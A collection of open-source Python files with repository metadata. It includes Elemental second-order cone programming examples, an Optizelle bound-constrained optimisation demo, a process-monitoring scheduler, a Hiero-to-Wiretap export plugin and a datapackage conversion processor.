G.QueueUpdate( 4, 5, 1 )
G.QueueUpdate( 5, 4, -2 )
G.QueueUpdate( 6, 1, -1 )
G.QueueUpdate( 7, 1, -1 )
G.QueueUpdate( 8, 6, -2 )
G.QueueUpdate( 9, 6, -1 )
G.QueueUpdate( 9, 7, -1 )
G.QueueUpdate( 10, 6, -1 )
G.QueueUpdate( 10, 7, 1 )
G.QueueUpdate( 12, 0, -1 )
G.QueueUpdate( 13, 0, -1 )
G.QueueUpdate( 14, 5, -2 )
G.QueueUpdate( 15, 2, -1 )
G.QueueUpdate( 15, 5, -1 )
G.QueueUpdate( 16, 2, 1 )
G.QueueUpdate( 16, 5, -1 )
G.QueueUpdate( 17, 7, -2 )
G.QueueUpdate( 18, 0, -1 )
G.QueueUpdate( 18, 1, -1 )
G.QueueUpdate( 19, 0, -1 )
G.QueueUpdate( 19, 1, 1 )
G.QueueUpdate( 20, 3, -2 )
G.ProcessQueues()
# Single linear equality A x = b, i.e. x_0 = 7.45.
b = El.DistMultiVec(El.dTag)
b.Resize( 1, 1 )
b.Set( 0, 0, 7.45 )
A = El.DistSparseMatrix(El.dTag)
El.Zeros( A, 1, 8 )
A.Reserve( 1 )
A.QueueUpdate( 0, 0, 1 )
A.ProcessQueues()
# Primal/dual solution vectors, filled in by the solver.
x = El.DistMultiVec()
y = El.DistMultiVec()
z = El.DistMultiVec()
s = El.DistMultiVec()
# Verbose Mehrotra predictor-corrector with outer equilibration/timing.
ctrl = El.SOCPAffineCtrl_d()
ctrl.mehrotraCtrl.qsdCtrl.progress = True
ctrl.mehrotraCtrl.progress = True
ctrl.mehrotraCtrl.outerEquil = True
ctrl.mehrotraCtrl.time = True
El.SOCPAffine(A,G,b,c,h,orders,firstInds,labels,x,y,z,s,ctrl)
El.Finalize()
| {
"repo_name": "justusc/Elemental",
"path": "examples/interface/SOCAtom.py",
"copies": "1",
"size": "1966",
"license": "bsd-3-clause",
"hash": -8457385428055271000,
"line_mean": 21.8604651163,
"line_max": 61,
"alpha_frac": 0.6312309257,
"autogenerated": false,
"ratio": 2.0564853556485354,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.31877162813485355,
"avg_score": null,
"num_lines": null
} |
# A problematic SOC problem from CVXPY's tests.
import El
El.Initialize()
# Cone metadata for 7 second-order cones, each of dimension 3:
# orders[i] is the size of the cone containing entry i, firstInds[i] the
# index at which that cone starts.
orders = El.DistMultiVec(El.iTag)
firstInds = El.DistMultiVec(El.iTag)
orders.Resize(21,1)
firstInds.Resize(21,1)
for c in xrange(7):
    for i in xrange(3):
        orders.Set(3*c+i,0,3)
        firstInds.Set(3*c+i,0,3*c)
# h: right-hand side of the conic constraint G x + s = h, s in K.
h = El.DistMultiVec(El.dTag)
El.Zeros( h, 21, 1 )
h.Set( 3, 0, 1 )
h.Set( 4, 0, 1 )
h.Set( 6, 0, 1 )
h.Set( 7, 0, -1 )
h.Set( 11, 0, 2 )
h.Set( 12, 0, 1 )
h.Set( 13, 0, -1 )
# Linear objective: minimize c^T x = x_1.
# (Note: this rebinds the loop variable c from above.)
c = El.DistMultiVec(El.dTag)
El.Zeros( c, 8, 1 )
c.Set( 1, 0, 1 )
# G: 21x8 sparse conic-constraint matrix with 28 explicit nonzeros.
G = El.DistSparseMatrix(El.dTag)
El.Zeros( G, 21, 8 )
G.Reserve( 28 )
G.QueueUpdate( 0, 3, -1 )
G.QueueUpdate( 0, 4, -1 )
G.QueueUpdate( 1, 3, -1 )
G.QueueUpdate( 1, 4, 1 )
G.QueueUpdate( 2, 2, -2 )
G.QueueUpdate( 3, 5, -1 )
G.QueueUpdate( 4, 5, 1 )
G.QueueUpdate( 5, 4, -2 )
G.QueueUpdate( 6, 1, -1 )
G.QueueUpdate( 7, 1, -1 )
G.QueueUpdate( 8, 6, -2 )
G.QueueUpdate( 9, 6, -1 )
G.QueueUpdate( 9, 7, -1 )
G.QueueUpdate( 10, 6, -1 )
G.QueueUpdate( 10, 7, 1 )
G.QueueUpdate( 12, 0, -1 )
G.QueueUpdate( 13, 0, -1 )
G.QueueUpdate( 14, 5, -2 )
G.QueueUpdate( 15, 2, -1 )
G.QueueUpdate( 15, 5, -1 )
G.QueueUpdate( 16, 2, 1 )
G.QueueUpdate( 16, 5, -1 )
G.QueueUpdate( 17, 7, -2 )
G.QueueUpdate( 18, 0, -1 )
G.QueueUpdate( 18, 1, -1 )
G.QueueUpdate( 19, 0, -1 )
G.QueueUpdate( 19, 1, 1 )
G.QueueUpdate( 20, 3, -2 )
G.ProcessQueues()
# Single linear equality A x = b, i.e. x_0 = 7.45.
b = El.DistMultiVec(El.dTag)
b.Resize( 1, 1 )
b.Set( 0, 0, 7.45 )
A = El.DistSparseMatrix(El.dTag)
El.Zeros( A, 1, 8 )
A.Reserve( 1 )
A.QueueUpdate( 0, 0, 1 )
A.ProcessQueues()
# Primal/dual solution vectors, filled in by the solver.
x = El.DistMultiVec()
y = El.DistMultiVec()
z = El.DistMultiVec()
s = El.DistMultiVec()
# Verbose Mehrotra predictor-corrector with outer equilibration/timing.
ctrl = El.SOCPAffineCtrl_d()
ctrl.mehrotraCtrl.qsdCtrl.progress = True
ctrl.mehrotraCtrl.progress = True
ctrl.mehrotraCtrl.outerEquil = True
ctrl.mehrotraCtrl.time = True
El.SOCPAffine(A,G,b,c,h,orders,firstInds,x,y,z,s,ctrl)
El.Finalize()
| {
"repo_name": "birm/Elemental",
"path": "examples/interface/SOCAtom.py",
"copies": "1",
"size": "1879",
"license": "bsd-3-clause",
"hash": 3789601035910219000,
"line_mean": 21.6385542169,
"line_max": 54,
"alpha_frac": 0.6279936136,
"autogenerated": false,
"ratio": 2.0513100436681224,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.7914356255110995,
"avg_score": 0.05298948043142533,
"num_lines": 83
} |
# A problematic SOC problem from CVXPY's tests.
# NOTE(review): no El.Initialize() call here (unlike the sibling
# examples) -- presumably this Elemental version initializes on import;
# confirm, since El.Finalize() is still called at the end.
import El
# Cone metadata for 7 second-order cones, each of dimension 3:
# orders[i] is the size of the cone containing entry i, firstInds[i] the
# index at which that cone starts.
orders = El.DistMultiVec(El.iTag)
firstInds = El.DistMultiVec(El.iTag)
orders.Resize(21,1)
firstInds.Resize(21,1)
for c in xrange(7):
    for i in xrange(3):
        orders.Set(3*c+i,0,3)
        firstInds.Set(3*c+i,0,3*c)
# h: right-hand side of the conic constraint G x + s = h, s in K.
h = El.DistMultiVec(El.dTag)
El.Zeros( h, 21, 1 )
h.Set( 3, 0, 1 )
h.Set( 4, 0, 1 )
h.Set( 6, 0, 1 )
h.Set( 7, 0, -1 )
h.Set( 11, 0, 2 )
h.Set( 12, 0, 1 )
h.Set( 13, 0, -1 )
# Linear objective: minimize c^T x = x_1.
# (Note: this rebinds the loop variable c from above.)
c = El.DistMultiVec(El.dTag)
El.Zeros( c, 8, 1 )
c.Set( 1, 0, 1 )
# G: 21x8 sparse conic-constraint matrix with 28 explicit nonzeros.
# The passive flag -- presumably marking updates as locally owned with
# no communication to queue; see the Elemental docs to confirm.
G = El.DistSparseMatrix(El.dTag)
El.Zeros( G, 21, 8 )
G.Reserve( 28 )
G.QueueUpdate( 0, 3, -1, passive=True )
G.QueueUpdate( 0, 4, -1, passive=True )
G.QueueUpdate( 1, 3, -1, passive=True )
G.QueueUpdate( 1, 4, 1, passive=True )
G.QueueUpdate( 2, 2, -2, passive=True )
G.QueueUpdate( 3, 5, -1, passive=True )
G.QueueUpdate( 4, 5, 1, passive=True )
G.QueueUpdate( 5, 4, -2, passive=True )
G.QueueUpdate( 6, 1, -1, passive=True )
G.QueueUpdate( 7, 1, -1, passive=True )
G.QueueUpdate( 8, 6, -2, passive=True )
G.QueueUpdate( 9, 6, -1, passive=True )
G.QueueUpdate( 9, 7, -1, passive=True )
G.QueueUpdate( 10, 6, -1, passive=True )
G.QueueUpdate( 10, 7, 1, passive=True )
G.QueueUpdate( 12, 0, -1, passive=True )
G.QueueUpdate( 13, 0, -1, passive=True )
G.QueueUpdate( 14, 5, -2, passive=True )
G.QueueUpdate( 15, 2, -1, passive=True )
G.QueueUpdate( 15, 5, -1, passive=True )
G.QueueUpdate( 16, 2, 1, passive=True )
G.QueueUpdate( 16, 5, -1, passive=True )
G.QueueUpdate( 17, 7, -2, passive=True )
G.QueueUpdate( 18, 0, -1, passive=True )
G.QueueUpdate( 18, 1, -1, passive=True )
G.QueueUpdate( 19, 0, -1, passive=True )
G.QueueUpdate( 19, 1, 1, passive=True )
G.QueueUpdate( 20, 3, -2, passive=True )
G.ProcessQueues()
# Single linear equality A x = b, i.e. x_0 = 7.45.
b = El.DistMultiVec(El.dTag)
b.Resize( 1, 1 )
b.Set( 0, 0, 7.45 )
A = El.DistSparseMatrix(El.dTag)
El.Zeros( A, 1, 8 )
A.Reserve( 1 )
A.QueueUpdate( 0, 0, 1, passive=True )
A.ProcessQueues()
# Primal/dual solution vectors, filled in by the solver.
x = El.DistMultiVec()
y = El.DistMultiVec()
z = El.DistMultiVec()
s = El.DistMultiVec()
# Verbose Mehrotra predictor-corrector with outer equilibration/timing.
ctrl = El.SOCPAffineCtrl_d()
ctrl.mehrotraCtrl.solveCtrl.progress = True
ctrl.mehrotraCtrl.progress = True
ctrl.mehrotraCtrl.outerEquil = True
ctrl.mehrotraCtrl.time = True
El.SOCPAffine(A,G,b,c,h,orders,firstInds,x,y,z,s,ctrl)
El.Finalize()
| {
"repo_name": "mcopik/Elemental",
"path": "examples/interface/SOCAtom.py",
"copies": "2",
"size": "2271",
"license": "bsd-3-clause",
"hash": 6212352500490264000,
"line_mean": 26.6951219512,
"line_max": 54,
"alpha_frac": 0.6556583003,
"autogenerated": false,
"ratio": 2.2134502923976607,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.38691085926976604,
"avg_score": null,
"num_lines": null
} |
# A problem that helps us determine how to scale inequality constrained
# optimization problems
import Optizelle
import numpy
import sys
# Define a simple objective where
#
# f(x) = 0.5 || x - c ||^2
#
class MyObj(Optizelle.ScalarValuedFunction):
    """Quadratic objective f(x) = 0.5 * || x - c ||^2."""
    def __init__(self, c):
        # Center of the quadratic bowl.
        self.c = c
    def eval(self, x):
        """Return the objective value at x."""
        residual = x - self.c
        return 0.5 * numpy.dot(residual, residual)
    def grad(self, x, grad):
        """Write the gradient, grad f(x) = x - c, into grad."""
        numpy.copyto(grad, x - self.c)
    def hessvec(self, x, dx, H_dx):
        """Write the Hessian-vector product into H_dx (Hessian is I)."""
        numpy.copyto(H_dx, dx)
# Define simple inequalities
#
# h(x) = x - lb
#
class MyIneq(Optizelle.VectorValuedFunction):
    """Affine bound constraint h(x) = x - lb (required to be >= 0)."""
    # Grab the lower bound
    def __init__(self, lb):
        self.lb = lb
    # z=h(x)
    def eval(self, x, z):
        # Bug fix: use the bound stored on the instance rather than the
        # module-level variable `lb`, which this previously read by
        # accident (it only worked because the script defines one).
        numpy.copyto(z, x - self.lb)
    # z=h'(x)dx
    def p(self, x, dx, z):
        numpy.copyto(z, dx)
    # xhat=h'(x)*dz
    def ps(self, x, dz, xhat):
        numpy.copyto(xhat, dz)
    # xhat=(h''(x)dx)*dz
    def pps(self, x, dx, dz, xhat):
        # h is affine, so its second derivative vanishes.
        xhat.fill(0.)
# Read in the name for the input file
if len(sys.argv)!=2:
sys.exit("inequality_scaling.py <parameters>")
fname=sys.argv[1]
# Set the size
m = 10;
# Generate an initial guess
x = numpy.array([1.+10**(-x) for x in range(1,m+1)])
# Allocate memory for the inequality multiplier
z = numpy.array(m*[0.])
# Create the center of the objective function
c = numpy.array(m*[-1.])
# Create the lower bound for the problem
lb = numpy.array(m*[1.])
# Create an optimization state
state=Optizelle.InequalityConstrained.State.t(Optizelle.Rm,Optizelle.Rm,x,z)
# Read the parameters from file
Optizelle.json.InequalityConstrained.read(
Optizelle.Rm,Optizelle.Rm,fname,state)
# Create a bundle of functions
fns=Optizelle.InequalityConstrained.Functions.t()
fns.f=MyObj(c)
fns.h=MyIneq(lb)
# Solve the optimization problem
Optizelle.InequalityConstrained.Algorithms.getMin(
Optizelle.Rm,Optizelle.Rm,Optizelle.Messaging.stdout,fns,state)
# Print out the reason for convergence
print("The algorithm converged due to: %s" % (
Optizelle.OptimizationStop.to_string(state.opt_stop)))
# Print out the final answer
print("The optimal point is: [")
for i in range(m):
print("%1.16e" % state.x[i])
print("]")
# Write out the final answer to file
Optizelle.json.InequalityConstrained.write_restart(
Optizelle.Rm,Optizelle.Rm,"solution.json",state)
| {
"repo_name": "OptimoJoe/Optizelle",
"path": "src/examples/inequality_scaling/inequality_scaling.py",
"copies": "1",
"size": "2440",
"license": "bsd-2-clause",
"hash": 7245537966458875000,
"line_mean": 22.6893203883,
"line_max": 76,
"alpha_frac": 0.6717213115,
"autogenerated": false,
"ratio": 2.7853881278538815,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.3957109439353882,
"avg_score": null,
"num_lines": null
} |
"""A process monitoring tool."""
import heapq
import itertools
import logging
import time
def generate_intervals(clock):
    """Yield the time elapsed between successive ``next()`` calls.

    ``clock`` is any zero-argument callable returning a timestamp; each
    yielded value is the difference between the current reading and the
    reading taken when the previous value was requested."""
    previous = clock()
    while True:
        current = clock()
        yield current - previous
        previous = current
def local_stopwatch():
    """Generate time elapsed between iterations.

    Uses ``time.perf_counter``: ``time.clock`` was removed in Python 3.8,
    and ``perf_counter`` is the documented replacement for measuring
    short intervals."""
    return generate_intervals(time.perf_counter)
def generate_deadlines(start, period, skip=0):
    """Yield evenly spaced deadlines ``start, start + period, ...``.

    The schedule is anchored to ``start`` rather than to the current
    time: if one occurrence is serviced late, later deadlines are not
    pushed back, so the consumer "catches up" instead of drifting.
    The first ``skip`` deadlines are suppressed (but still advance the
    schedule)."""
    deadline = start
    while True:
        if skip <= 0:
            yield deadline
        else:
            skip -= 1
        deadline += period
class Scheduler(object):
    """Clock-agnostic deferral of actions, backed by a binary heap."""
    def __init__(self):
        self.queue = []
        self.index = itertools.count(start=1)
    def next_deadline(self):
        """Return the earliest scheduled deadline, or ``None`` if empty.

        Lets the owner sleep exactly until something is due instead of
        polling."""
        return self.queue[0][0] if self.queue else None
    def schedule(self, deadline, action):
        """Queue ``action`` for release once ``deadline`` is reached.

        A monotonically increasing sequence number is stored with each
        entry so equal deadlines release in FIFO order (and the heap
        never has to compare the actions themselves)."""
        entry = (deadline, next(self.index), action)
        heapq.heappush(self.queue, entry)
    def elapsed(self, now):
        """Yield every action whose deadline is at or before ``now``.

        Actions come out ordered by deadline, FIFO among ties, all the
        while respecting time constraints."""
        while self.queue and self.queue[0][0] <= now:
            _, _, action = heapq.heappop(self.queue)
            yield action
class AllSeeingEye(object):
    """Efficient monitor aggregation.

    Polls registered monitor callables on their own periods and forwards
    each sample to its ``notify`` callback, using a ``Scheduler`` so the
    owner can sleep until the next poll is due."""
    def __init__(self, clock=time.perf_counter):
        # time.perf_counter replaces time.clock, which was removed in
        # Python 3.8 and would make importing this module fail there.
        self.monitors = {}
        self.scheduler = Scheduler()
        self.clock = clock
    def time_to_wait(self):
        """Seconds until the next poll is due, or ``None`` when idle.

        May be negative if a deadline has already elapsed."""
        deadline = self.scheduler.next_deadline()
        if deadline is None:
            return None
        return deadline - self.clock()
    def watching(self, label):
        """Check if the all seeing eye is watching ``label``."""
        return label in self.monitors
    def watch(self, label, monitor, period, notify):
        """Poll ``monitor`` every ``period`` and pass samples to ``notify``.

        ``notify`` returning a falsy value cancels the watch.  Raises
        ``KeyError`` if ``label`` is already registered."""
        if self.watching(label):
            raise KeyError('Already watching "%s".' % label)
        # skip=1: the first poll happens one full period from now.
        deadlines = generate_deadlines(self.clock(), period, skip=1)
        def action():
            """Invoke the notification function and auto-reregister."""
            try:
                # Auto-cancel when desired.
                if notify(monitor()):
                    self.scheduler.schedule(next(deadlines), action)
                else:
                    del self.monitors[label]
            except Exception:  # pylint: disable=broad-except
                # NOTE(review): a raising monitor stops being polled but
                # stays in self.monitors, so watching(label) remains True
                # and the label can never be reused -- confirm intended.
                logging.exception('Polling "%s".', label)
        self.scheduler.schedule(next(deadlines), action)
        self.monitors[label] = monitor
    def blink(self):
        """Dispatch actions for all ready monitors; return how many ran."""
        count = 0
        for action in self.scheduler.elapsed(self.clock()):
            action()
            count += 1
        return count
| {
"repo_name": "AndreLouisCaron/spectator",
"path": "spectator/__init__.py",
"copies": "1",
"size": "3993",
"license": "bsd-2-clause",
"hash": -8731470144121904000,
"line_mean": 32.275,
"line_max": 79,
"alpha_frac": 0.6133233158,
"autogenerated": false,
"ratio": 4.4614525139664805,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5574775829766481,
"avg_score": null,
"num_lines": null
} |
"""A processor for sending shots to an Autodesk IFFFS server (Stone FS) via
Wiretap.
@author Brendan Holt
@date May 2014
@defgroup modFnWiretapShotProcessor FnWiretapShotProcessor
@{
"""
import os.path
import hiero.core
from hiero.exporters.FnShotProcessor import ShotProcessor, ShotProcessorPreset
import hiero.ui
from PySide import QtCore, QtGui
import Path
import FnStonify
import FnWiretapShotProcessorUI
from WiretapBrowser import ChooseContainerNode
from WiretapTools import SplitHostname
class WiretapShotProcessor(ShotProcessor):
    """A custom Hiero shot processor that works in tandem with the Stonify task
    and provides a streamlined interface for translating Wiretap node paths
    into appropriate export structures.
    """
    def __init__(self, preset, submission=None, synchronous=False):
        """Initializes the Wiretap shot processor given a preset and submission
        information.
        @param[in] preset \c{(WiretapShotProcessorPreset)} The preset
                          associated with this shot processor.
        @param[in] submission \c{(hiero.exporters.FnSubmission.Submission)} The
                              submission task group used for spawning tasks.
        @param[in] synchronous \c{(bool)} Whether spawned tasks should be
                               processed synchronously.
        """
        super(WiretapShotProcessor, self).__init__(preset, submission,
                                                   synchronous)
    def displayName(self):
        """The label for this shot processor as it should appear in the export
        dialog.
        @return \c{(str)} The display name for this shot processor.
        """
        return "Wiretap Shot Processor"
    def toolTip(self):
        """A pop-up summary of this feature when the mouse hovers over the
        processor selection in the export dialog.
        @return \c{(str)} The tooltip for this shot processor.
        """
        return ("The Wiretap Shot Processor sends supported video/frame "
                "formats to a Stone FS.")
    def populateUI(self, widget, exportItems, editMode=None):
        """Inserts custom Qt widgets above the export structure viewer for
        selecting a Wiretap destination node.
        @param[in] widget \c{(QtGui.QWidget)} The parent widget that will
                          contain GUI controls exposed for this processor.
        @param[in] exportItems \c{(list)} The media selected in the Hiero
                               interface to be exported. Each item is wrapped
                               as a \c{hiero.core.ItemWrapper} instance.
        @param[in] editMode \c{(hiero.ui.IProcessorUI.EditMode)} Whether to
                            expose the full UI (Hiero) or a limited subset
                            (HieroPlayer).
        """
        # Stack the custom header above the stock shot-processor form.
        layout = QtGui.QVBoxLayout(widget)
        layout.setContentsMargins(0, 0, 0, 0)
        header = ProcessorHeader()
        defaultForm = QtGui.QWidget()
        layout.addWidget(header)
        layout.addWidget(defaultForm)
        # Let the base class build its standard UI inside defaultForm.
        super(WiretapShotProcessor, self).populateUI(defaultForm, exportItems,
                                                     editMode)
        # The header needs these references so AddElement() can write into
        # the same export template the base UI displays.
        header.exportTemplate = self._exportTemplate
        header.exportStructureViewer = self._exportStructureViewer
    def startProcessing(self, exportItems):
        """Adds an entry to the CBSD usage log before processing the selected
        export items.
        @param[in] exportItems \c{(list)} The media selected in the Hiero
                               interface to be exported. Each item is wrapped
                               as a \c{hiero.core.ItemWrapper} instance.
        """
        super(WiretapShotProcessor, self).startProcessing(exportItems)
    def validate(self, exportItems):
        """Modified version of Hiero's validation routine that does not enforce
        the requirement of an existing project root on a standard file system
        if there are only Stonify tasks in the export structure.
        @param[in] exportItems \c{(list)} The media selected in the Hiero
                               interface to be exported. Each item is wrapped
                               as a \c{hiero.core.ItemWrapper} instance.
        @see \c{hiero.exporters.FnShotProcessor.ShotProcessor.validate()}
        @see \c{hiero.ui.FnProcessorUI.ProcessorUIBase.validate()}
        """
        # Do the standard validation if any non-Stonify tasks are present
        doStandardValidation = False
        for exportPath, preset in self._exportTemplate.flatten():
            # NOTE: isinstance() sometimes fails to match a valid object type
            # (maybe because FnStonify.py is loaded as a plugin?)
            if type(preset) is not FnStonify.StonifyPreset:
                doStandardValidation = True
            else:
                # Set a flag on Stonify presets to let the task know that it is
                # being executed by the Wiretap Shot Processor
                preset.setPropertiesValue('isWiretapShotProcess', True)
        if doStandardValidation:
            return super(WiretapShotProcessor, self).validate(exportItems)
        # Since only Stonify tasks are present, perform almost the same
        # validation as the standard shot processor, except do not check
        # whether the project root has been set.
        # Copied from FnShotProcessor.py
        invalidItems = []
        # Look for selected items which aren't of the correct type
        for item in exportItems:
            if not item.sequence() and not item.trackItem():
                invalidItems.append(item.item().name() +
                                    " <span style='color: #CC0000'>"
                                    "(Not a Sequence)</span>")
        # Found invalid items
        if invalidItems:
            # Show warning
            msgBox = QtGui.QMessageBox()
            msgBox.setTextFormat(QtCore.Qt.RichText)
            result = msgBox.information(
                None, "Export",
                "The following items will be ignored by this export:<br/>%s"
                % str("<br/>".join(invalidItems)),
                QtGui.QMessageBox.Ok | QtGui.QMessageBox.Cancel)
            # Continue if user clicks OK
            return result == QtGui.QMessageBox.Ok
        # Copied from FnProcessorUI.py
        # Check for offline track items
        if not self.checkOfflineMedia(exportItems):
            return False
        # Do any ShotProcessor-specific validation here...
        return True
class ProcessorHeader(QtGui.QWidget, FnWiretapShotProcessorUI.Ui_Form):
    """A custom header for the Wiretap shot processor that is inserted above
    the export structure viewer.
    """
    def __init__(self):
        """Initializes the header UI for the Wiretap shot processor section of
        the export dialog.
        """
        super(ProcessorHeader, self).__init__()
        self.setupUi(self)
        self.layout().setContentsMargins(0, 0, 0, 0)
        # Override path to CBSD logo
        logoPath = os.path.join(os.path.dirname(__file__),
                                '../resources/images/cbsd_logo.png')
        logoPath = os.path.normpath(logoPath)
        self.logoLabel.setPixmap(QtGui.QPixmap(logoPath))
        # An "Ignored" vertical policy collapses the notes label by default.
        self.notesLabel.setSizePolicy(QtGui.QSizePolicy.Preferred,
                                      QtGui.QSizePolicy.Ignored)
        ## \c{(bool)} Whether additional instructions related to the shot
        #  processor configuration are visible.
        self.notesVisible = False
        ## \c{(hiero.core.FnExportStructure.ExportStructure2)} A reference to
        #  the current preset's export template.
        #
        #  @details Set externally by WiretapShotProcessor.populateUI().
        self.exportTemplate = None
        ## \c{(hiero.ui.ExportStructureViewer)} A reference to the Wiretap shot
        #  processor's export structure viewer.
        #
        #  @details Set externally by WiretapShotProcessor.populateUI().
        self.exportStructureViewer = None
        # Signal-slot pairs
        self.notesButton.clicked.connect(self.ToggleNotes)
        self.chooseButton.clicked.connect(self.ChooseNodePath)
        self.clipNameEdit.textEdited.connect(self.__FixClipName)
        self.addElementButton.clicked.connect(self.AddElement)
    #--------------------------------------------------------------------------
    # SLOTS
    #--------------------------------------------------------------------------
    def ToggleNotes(self):
        """Toggles the visibility of additional usage notes displayed in the
        processor header.
        @details This method is a Qt slot for when the expand/collapse notes
                 button is clicked.
        """
        if self.notesVisible:
            self.notesButton.setText('Notes [+]')
            self.notesLabel.setSizePolicy(QtGui.QSizePolicy.Preferred,
                                          QtGui.QSizePolicy.Ignored)
            self.notesVisible = False
        else:
            self.notesButton.setText(u'Notes [\u2212]')  # minus (not hyphen)
            self.notesLabel.setSizePolicy(QtGui.QSizePolicy.Preferred,
                                          QtGui.QSizePolicy.Preferred)
            self.notesVisible = True
    def ChooseNodePath(self):
        """Launches a Wiretap browser and displays the selected node path upon
        return.
        @details This method is a Qt slot for when the "Choose..." (Wiretap
                 library or reel) button is clicked.
        """
        nodePath = ChooseContainerNode()
        if nodePath:
            self.nodePathEdit.setText(nodePath)
    def __FixClipName(self, text):
        """Provides dynamic text substitutions and constraints when editing the
        clip name.
        @details This method is a Qt slot for when the contents of the clip
                 name text box are manually edited.  Slashes are stripped
                 because they would be parsed as node path separators.
        """
        substitutions = {
            '/': '',
            '\\': ''
        }
        # Preserve the caret position across the setText() call below.
        cursorPos = self.clipNameEdit.cursorPosition()
        for char in substitutions:
            text = text.replace(char, substitutions[char])
        self.clipNameEdit.setText(text)
        self.clipNameEdit.setCursorPosition(cursorPos)
    def AddElement(self):
        """Converts a Wiretap node path into an export structure and updates
        the export structure viewer with the new hierarchy.
        @details There is minimal path syntax checking in this method. The
                 Wiretap Browser will usually fix most typos.
        @throws Raises a <a href="http://docs.python.org/2.6/library/exceptions.html#exceptions.TypeError" target="_blank">
                TypeError</a> if the export structure viewer was not properly
                set by WiretapShotProcessor.populateUI().
        """
        if not self.exportStructureViewer:
            raise TypeError("Please connect the shot processor's export "
                            "structure viewer to this header instance.")
        # Don't discard double slashes at end to allow for unnamed nodes.
        # (The previous list comprehension here was a no-op copy of split().)
        segments = self.nodePathEdit.text().split('/')
        hostname = SplitHostname(segments[0])[0]  # drop "IFFFS"
        # Require a clip name
        # NOTE: The actual path requirements for uploading to a Wiretap IFFFS
        # server are more strict, but path validation happens elsewhere.
        clipName = self.clipNameEdit.text().strip()
        if clipName:
            segments.append(clipName)
        elementPath = Path.Join(hostname, *segments[1:])
        # Populate export structure
        root = self.exportTemplate.rootElement()
        if clipName:
            root.createChild(elementPath, True)
            leaf = root[elementPath]
            # Add preset to leaf element
            # NOTE: Be sure to update the string representation of the Stonify
            # task if the module or class name changes.
            preset = FnStonify.StonifyPreset(name='FnStonify.StonifyTask',
                                             properties={})
            if leaf is not None:
                leaf.setPreset(preset)
            else:
                print("WARNING: Unable to set Stonify content on element " +
                      elementPath)
        elif elementPath:
            root.createChild(elementPath, False)
        self.exportStructureViewer.refresh()
class WiretapShotProcessorPreset(ShotProcessorPreset):
    """Stores settings for use with the Wiretap shot processor and its
    corresponding UI class that augments the export dialog interface.
    """
    def __init__(self, name, properties):
        """Sets up the Wiretap shot processor preset with default properties.
        @param[in] name \c{(str)} The preset name, usually handled
                        automatically by Hiero.
        @param[in] properties \c{(dict)} Preset properties to be updated.
        """
        super(WiretapShotProcessorPreset, self).__init__(name, properties)
        # Necessary in order for Hiero to view this plugin as different from
        # the default shot processor
        self._parentType = WiretapShotProcessor
# Make the processor and its preset known to Hiero so the "Wiretap Shot
# Processor" entry appears in the export dialog.
# NOTE(review): registerProcessorUI is passed the processor class itself
# rather than a separate UI class — confirm this is intended.
hiero.core.taskRegistry.registerProcessor(WiretapShotProcessorPreset,
                                          WiretapShotProcessor)
hiero.ui.taskUIRegistry.registerProcessorUI(WiretapShotProcessorPreset,
                                            WiretapShotProcessor)
## @}
| {
"repo_name": "CBSDigital/Hiero-Wiretap",
"path": "plugins/FnWiretapShotProcessor.py",
"copies": "1",
"size": "13979",
"license": "bsd-3-clause",
"hash": 6283784788254564000,
"line_mean": 39.9941348974,
"line_max": 123,
"alpha_frac": 0.5928177981,
"autogenerated": false,
"ratio": 4.639561898440093,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5732379696540093,
"avg_score": null,
"num_lines": null
} |
"""A processor to convert the description file into a datapackage."""
import json
import logging
import arrow
import yaml
from parser import ParserError
from slugify import slugify
from datapackage_pipelines.wrapper import spew, ingest
from common.config import SOURCE_FILE, SOURCE_DATAPACKAGE_FILE, JSON_FORMAT
from datapackage_pipelines.utilities.resources import PROP_STREAMING
def save_to_file(datapackage):
    """Dump the datapackage dictionary to disk as pretty-printed JSON."""
    contents = json.dumps(datapackage, indent=4, ensure_ascii=False)
    with open(SOURCE_DATAPACKAGE_FILE, 'w+') as handle:
        handle.write(contents)
def drop_empty_properties(field):
    """Return a copy of ``field`` without falsy values.

    Empty properties cause datapackage validation to fail, so they are
    stripped out entirely.
    """
    cleaned = {}
    for key, value in field.items():
        if value:
            cleaned[key] = value
    return cleaned
def fix_date(raw_date):
    """Return ``raw_date`` as an ISO-8601 date, or None if unparseable."""
    try:
        parsed = arrow.get(raw_date)
    except ParserError:
        logging.warning('Could not parse date = %s', raw_date)
        return None
    return parsed.format('YYYY-MM-DD')
def fix_resource(first_resource, resource):
    """Fill falsy or missing properties of ``resource`` from ``first_resource``.

    The resource is updated in place and also returned.
    """
    for key, value in first_resource.items():
        if not resource.get(key):
            resource[key] = value
    return resource
def convert_to_name(title):
    """Return a datapackage-compliant name slug derived from ``title``."""
    slug = slugify(title, separator='-')
    return slug.lower()
def fix_fields(fields):
    """Return a valid, clean version of the field list.

    Each field has its empty properties dropped, its name trimmed and its
    type forced to string.  The list is updated in place and returned.
    """
    cleaned_fields = []
    for field in fields:
        cleaned = drop_empty_properties(field)
        cleaned['name'] = cleaned['name'].strip()
        cleaned['type'] = 'string'
        cleaned_fields.append(cleaned)
    fields[:] = cleaned_fields
    return fields
def create_datapackage(datapackage=None):
    """Convert a source description to a standard datapackage.

    :param datapackage: the raw description as a ``dict``; must contain a
        ``resources`` list whose first entry is used to fill in the others.
    :returns: the cleaned-up datapackage ``dict``.
    """
    # Bug fix: the previous signature used a mutable default ({}), which is
    # shared across calls; use None as the sentinel instead.
    datapackage = {} if datapackage is None else datapackage
    datapackage = drop_empty_properties(datapackage)
    first_resource = datapackage['resources'][0]
    for resource in datapackage['resources']:
        resource = fix_resource(first_resource, resource)
        resource['name'] = convert_to_name(resource['title'])
        resource['schema']['fields'] = fix_fields(resource['schema']['fields'])
        resource[PROP_STREAMING] = True
        if 'publication_date' in resource:
            raw_date = resource['publication_date']
            resource['publication_date'] = fix_date(raw_date)
    datapackage_dump = json.dumps(datapackage, **JSON_FORMAT)
    logging.debug('Datapackage: \n%s', datapackage_dump)
    return datapackage
if __name__ == '__main__':
    # Pipeline entry point: build the datapackage from the step parameters
    # and pass one empty stream per resource downstream.
    parameters, _, _ = ingest()
    datapackage_ = create_datapackage(**parameters)
